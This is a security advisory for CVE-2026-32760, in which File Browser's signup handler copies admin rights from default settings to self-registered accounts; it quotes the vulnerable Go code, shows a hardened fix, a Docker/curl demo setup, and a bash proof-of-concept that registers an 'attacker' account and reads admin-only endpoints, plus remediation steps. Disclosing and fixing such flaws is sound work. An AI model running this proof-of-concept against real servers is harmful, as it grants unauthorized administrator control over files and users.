CVE-2026-32760
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Description
## Summary

Any unauthenticated visitor can register a full administrator account when self-registration (`signup = true`) is enabled and the default user permissions have `perm.admin = true`. The signup handler blindly applies all default settings - including `Perm.Admin` - to the new user without any server-side guard that strips admin from self-registered accounts.

## Details

**Affected file:** `http/auth.go`

**Vulnerable code:**

```go
// signupHandler (http/auth.go)
user := &users.User{
	Username: info.Username,
}
d.settings.Defaults.Apply(user) // ← copies Perm.Admin = true if set in defaults
// NO guard: user.Perm.Admin is never cleared here
```

**`settings.UserDefaults.Apply` (settings/defaults.go):**

```go
func (d *UserDefaults) Apply(u *users.User) {
	u.Perm = d.Perm // copies full Permissions struct, including Admin field
	...
}
```

**Settings API permits Admin in defaults (http/settings.go):**

```go
var settingsPutHandler = withAdmin(func(_ http.ResponseWriter, r *http.Request, d *data) (int, error) {
	...
	d.settings.Defaults = req.Defaults // Admin can set Defaults.Perm.Admin = true
	...
})
```

The `signupHandler` is supposed to create unprivileged accounts for new visitors. It contains no explicit `user.Perm.Admin = false` reset after `Defaults.Apply`. If an administrator (intentionally or accidentally) configures `defaults.perm.admin = true` and also enables signup, every account created via the public registration endpoint is an administrator with full control over all files, users, and server settings.
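To make the missing guard concrete, the following is an added example (not File Browser's own code) that models the signup flow with simplified `User`, `Permissions` and `UserDefaults` stand-ins and contrasts the unguarded path with one that clears `Perm.Admin` after `Apply`. The type shapes and the `signupVulnerable`/`signupHardened` names are assumptions for illustration; only the copy-the-whole-struct behaviour of `Apply` comes from the advisory.

```go
package main

import "fmt"

// Permissions is a simplified stand-in for users.Permissions (constructed
// for this example; the real struct has more fields).
type Permissions struct {
	Admin    bool
	Download bool
}

// User and UserDefaults are likewise simplified stand-ins.
type User struct {
	Username string
	Perm     Permissions
}

type UserDefaults struct {
	Perm Permissions
}

// Apply copies the whole Permissions struct, Admin included, which is the
// behaviour the advisory attributes to settings.UserDefaults.Apply.
func (d *UserDefaults) Apply(u *User) {
	u.Perm = d.Perm
}

// signupVulnerable models the unguarded handler: whatever the defaults
// hold, Admin included, lands on the self-registered account.
func signupVulnerable(d UserDefaults, username string) *User {
	u := &User{Username: username}
	d.Apply(u)
	return u
}

// signupHardened applies the same defaults, then clears Admin, so
// self-registration can never yield an administrator regardless of defaults.
func signupHardened(d UserDefaults, username string) *User {
	u := &User{Username: username}
	d.Apply(u)
	u.Perm.Admin = false // the missing server-side guard
	return u
}

func main() {
	defaults := UserDefaults{Perm: Permissions{Admin: true, Download: true}}
	fmt.Println(signupVulnerable(defaults, "visitor").Perm.Admin) // true
	fmt.Println(signupHardened(defaults, "visitor").Perm.Admin)   // false
}
```

The hardened variant keeps the other defaults (here `Download`) intact, so the fix does not change what a normal self-registered user can do.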
## Demo Server Setup

```bash
# Pull latest release
docker run -d --name fb-test \
  -p 8080:80 \
  -v /tmp/fb-data:/srv \
  filebrowser/filebrowser:v2.31.2

# Wait for startup, then set defaults.perm.admin = true
ADMIN_TOKEN=$(curl -s -X POST http://localhost:8080/api/login \
  -H 'Content-Type: application/json' \
  -d '{"username":"admin","password":"admin"}')

# Enable signup and set admin as default permission
curl -s -X PUT http://localhost:8080/api/settings \
  -H "X-Auth: $ADMIN_TOKEN" \
  -H 'Content-Type: application/json' \
  -d '{
    "signup": true,
    "defaults": {
      "perm": {
        "admin": true,
        "execute": true,
        "create": true,
        "rename": true,
        "modify": true,
        "delete": true,
        "share": true,
        "download": true
      }
    }
  }'
```

## PoC Exploit

```bash
#!/bin/bash
# poc_signup_admin.sh
# Demonstrates: unauthenticated signup → admin account

TARGET="http://localhost:8080"

echo "[*] Registering attacker account via public signup endpoint..."
STATUS=$(curl -s -o /dev/null -w "%{http_code}" \
  -X POST "$TARGET/api/signup" \
  -H "Content-Type: application/json" \
  -d '{"username":"attacker","password":"Attack3r!pass"}')
echo "[*] Signup response: HTTP $STATUS"

echo "[*] Logging in as newly created account..."
ATTACKER_TOKEN=$(curl -s -X POST "$TARGET/api/login" \
  -H "Content-Type: application/json" \
  -d '{"username":"attacker","password":"Attack3r!pass"}')

echo "[*] Fetching user list with attacker token (admin-only endpoint)..."
curl -s "$TARGET/api/users" \
  -H "X-Auth: $ATTACKER_TOKEN" | python3 -m json.tool

echo ""
echo "[*] Verifying admin access by reading /api/settings..."
curl -s "$TARGET/api/settings" \
  -H "X-Auth: $ATTACKER_TOKEN" | python3 -m json.tool
```

**Expected output:** The attacker's token successfully returns the full user list and server settings - endpoints restricted to `Perm.Admin = true` users.

## Impact

Any unauthenticated visitor who can reach `POST /api/signup` obtains a full admin account. From there, they can:

- List, read, modify, and delete every file on the server
- Create, modify, and delete all other users
- Change authentication method and server settings
- Execute arbitrary commands if `enableExec = true`
Analysis
Unauthenticated attackers can register administrator accounts in Docker when self-registration is enabled and default user permissions include admin privileges, as the signup handler fails to strip admin permissions from self-registered accounts. Public exploit code exists for this vulnerability. …
Remediation
Within 24 hours: disable self-registration (`signup = false`) immediately and audit all user accounts created since deployment for unauthorized administrators. Within 7 days: review and remove `perm.admin = true` from default user permissions settings, implement mandatory approval workflows for administrator account creation, and conduct forensic analysis of access logs for unauthorized activity. …
External POC / Exploit Code
GHSA-5gg9-5g7w-hm73